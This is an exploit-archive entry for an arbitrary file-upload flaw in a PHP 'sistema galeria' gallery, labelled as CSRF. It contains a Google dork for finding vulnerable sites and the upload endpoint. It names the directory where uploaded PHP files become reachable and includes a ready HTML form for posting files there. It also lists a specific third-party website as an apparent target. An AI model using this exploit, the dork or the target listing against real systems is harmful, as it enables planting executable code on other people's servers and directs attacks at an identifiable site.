sistema galeria File Upload Vulnerability CSRF

2017.05.06
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################# # sistema galeria File Upload Vulnerability | CSRF # Author : sohaip-hackerDZ # Google Dork: inurl:/sistema/galeria/server/ # Tested on: , Linux # data : 2017-05-05 # Blog : http://www.tools-hack.com/ ################################################################################# # [!] Exploit : http://127.0.0.1/path/sistema/galeria/server/php/index.php # [!] File Location : http:/127.0.0.1/path/sistema/galeria/server/php/galeria/medium/FILE_NAME.php ################################################################################# #CSRF: ################################################################################# <html> <body> <form enctype="multipart/form-data" action="127.0.0.1/sistema/galeria/server/php/index.php" method="post"> Your File: <input name="files[]" type="file" /><br /> <input type="submit" value="SIKAT!" /> </form> </body> </html> ################################################################################# # http://maximacoifasvale.com.br/sistema/galeria/server/php/index.php ################################################################################# # ABOUT: # Facebook: https://www.facebook.com/sohaipbarika # forum: http://spyhackerz.com/forum/ # #################################################################################

References:

http://www.tools-hack.com/2017/05/ex.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top